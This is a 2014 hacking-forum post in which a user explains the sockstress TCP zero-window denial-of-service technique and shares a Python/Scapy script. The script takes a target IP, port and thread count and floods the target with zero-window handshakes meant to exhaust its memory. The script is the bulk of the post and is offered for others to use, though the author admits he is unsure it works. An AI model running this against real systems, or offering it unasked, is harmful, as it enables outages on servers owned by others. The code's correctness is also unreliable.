Sockstress Exploit!

Discuss how to write good code, break bad code, your current pet projects, or the best way to approach novel problems

Sockstress Exploit!

Post by Fl0urite on Sun Apr 13, 2014 7:34 am
([msg=80243]see Sockstress Exploit![/msg])

This took me a few minutes and some googling to create this, for those of you who do not know what sockstress is, it is an exploit that takes advantage of a design flaw in TCP during the 3 way handeshake.

here is how it works

syn -> (4k window)
<- syn+ack (32k window)
ack -> (0 window)

the 0 windows size basically says the clients buffer is full, but the server prepares and stores the connection in RAM, basically it waits untill the client is ready.

What sockstress does is it creates loads of connections like that causing the system to crash (RAM full), untill the plug is pulled.

here is a video with a good example of the sockstress exploit:

https://www.youtube.com/watch?v=8B6tvJMfaDU

and a more detailed explanation. :lol:

please reffer to this wikipeida article for more info

http://en.wikipedia.org/wiki/Sockstress

Here is the code for the exploit it is not extremely powerful but you don't have to compile or have a vm or anything like that.Anyway hope you guys like this :P

I am not totaly sure if it works or not :/ as I can't get many cp/s

Code: Select all
#sockstress exploit with scapy
#coded by fl0urite
#Not totaly sure if this works
#v1.0.0
from threading import Thread
from scapy.all import *
import time
import sys
import os

ip=sys.argv[1]
port=int(sys.argv[2])
threads=int(sys.argv[3])

def Stress(ip,port):
   global connections
   global threads
   global failed
   global stop
   connections=0
   failed=0
   stop=0
   while 1:
      if stop==1:
         threads-=1
         exit()
      try:
         sequence=random.randrange(0,99999)
         i=IP(dst=ip)
         syn=i/TCP(sport=1500, dport=port, flags="S", seq=sequence)
         syn_ack=sr1(syn,verbose=0)[TCP].seq+1
         ack=i/TCP(sport=1500, dport=port, flags="A", seq=sequence+1, ack=syn_ack, window=0)
         send(ack,verbose=0)
         connections+=1
      except:
         failed+=1
for i in xrange(0,threads):
   try:
      t=Thread(target=(Stress),args=(ip,port))
      t.start()
   except:
      print "Could only start "+str(i)+" threads."
      break
while 1:
   try:
      time.sleep(0.1)
      print "\033[1m\033[5;0;31m"+str(connections/time.clock())+" cps "+str(connections)+" total           "
      print "Press ^C to stop...\033[0m"
      print "\033[3A"
   except KeyboardInterrupt:
      stop=1
      break
while threads>=1:
   print "\033[5;0;31mWaiting for "+str(threads)+" to finish...                  \033[0m"
   time.sleep(1)
Fl0urite
New User
New User
 
Posts: 6
Joined: Wed Feb 12, 2014 5:01 am
Blog: View Blog (0)


Return to Programming

Who is online

Users browsing this forum: No registered users and 0 guests